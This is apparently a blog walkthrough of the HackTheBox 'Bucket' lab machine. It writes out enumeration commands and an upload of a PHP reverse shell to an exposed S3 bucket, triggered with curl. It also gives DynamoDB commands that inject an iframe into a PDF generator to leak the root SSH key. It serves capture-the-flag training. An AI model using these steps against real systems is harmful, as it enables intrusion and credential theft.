In this post, i would like to share a walkthrough on Bucket Machine.

This room has been considered difficulty rated as a medium machine

Information Gathering on Bucket

Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Let’s see what’s stored in the website interface.

Let’s investigate the source of the web page.

We have aware that’s another URL that we can use

Scanning Process on Bucket

We can see that the URL is valid. So, let’s run the gobuster to get

From the resulting output, we notice that there’s /health/ directory that has been deployed there.

Nothing that we can look over here. After a while, we get another directory on gobuster output. So, let’s check it.

Now, we know that system is using Amazon Web Services or also known as AWS.

Tools use: Installing AWScli

We need to install AWScli to play with the machine.

We will execute the command sudo apt update && apt install awscli

AWS Configurations

Now we can try to gain access to the machine via reverse shell.

Before we can get the reverse shell, aws configure will need to setup first.

We don’t have to key-in the real key because this is for HTB room purposes such as Bucket Machine.

We can run the command aws dynamodb list-tables –endpoint-url http://s3.bucket.htb

Oh, wait! We got an error with the command, and we found out that the command will need to execute with root privilege.

We need to know any available tables in the machine, and we found nothing.

I don’t have any use for that information for now. But we will be coming back here when needed later.

aws –endpoint-url http://s3.bucket.htb. s3 ls

When we execute the command sudo aws –endpoint-url http://s3.bucket.htb. s3 ls, we did notice that adserver directory is there for some reason.

Let’s check what has been stored in that directory by executing sudo aws –endpoint-url http://s3.bucket.htb. s3 ls s3://adserver

There’s a website file such as index.html stored in the directory. I have been thinking that we can upload any file into the directory.

Let’s upload the PHP reverse shell inside.

I have modified the name of the file and we are set with the PHP reverse shell.

We have successfully uploaded the shell into the AWS environment.

We must start the netcat listener to get the reverse shell connection back to us.

I will use the curl function to run the shell from the target’s machine. The command for this is curl http://bucket.htb/<php reverse shell filename> &> /dev/null

As you can see in the screenshot above, we get a simple shell to play with.

Let’s upgrade the shell

For us to gain an upgraded shell, we need to use the following step

  1. Python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
  2. control z
  3. stty raw -echo; fg
  4. export TERM=xterm

Retrieve User Flag on Bucket Machine

Once upgrading the shell is completed, we need to find a valid user to gain the user flag

We found out that roy can be considered a valid user on the system

Let’s switch the current privileges(www-data) to roy privileges by running the command su roy. The password can be found within the configuration that we execute earlier.

We successfully have login as roy when we insert the correct password

We got the user Flag when we read the user.txt at /home/roy directory

Retrieve Root Flag (Pretty Hard!)

Firstly, we need to check the connection that the machine holds so that we can verify which port can be used for our next step

We notice that port 8000 is listening and so we need to look deep into the code by running curl http://localhost:8000

We can run the command such as head 30 index.php for a code understanding

It does look clean to read, right?

For the next step, we need to execute it quickly where the machine will clean everything in the machine(auto-delete) every 30 seconds.

I will post the command that will use so that it will be easier for you guys.

aws dynamodb create-table \    
 --table-name alerts \ 
 --attribute-definitions \         
AttributeName=title,AttributeType=S \         AttributeName=data,AttributeType=S \   
 --key-schema \
 AttributeName=title,KeyType=HASH \         AttributeName=data,KeyType=RANGE \ 
--provisioned-throughput \         ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://s3.bucket.htb
 aws dynamodb put-item \
--table-name alerts \
--item '{"title": {"S": "Ransomware"}, "data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}       }' \
 --return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb
curl --data "action=get_alerts" http://localhost:8000/
scp roy@$bucket.htb://var/www/bucket-app/files/result.pdf ./

If we don’t get the result.pdf, then you are not quick enough.

Please try faster!

For those receiving the result.pdf, congratulations on that. Let’s open the PDF file and there’s ssh id_rsa key stored inside the PDF file.

We need to copy-paste the ssh key into a simple file on your attacker’s machine. We can access the machine with root privileges via ssh service

As usual, we need to access /root/ directory so that we can retrieve the root flag


Happy Learning Guys!

Leave a Reply

Your email address will not be published. Required fields are marked *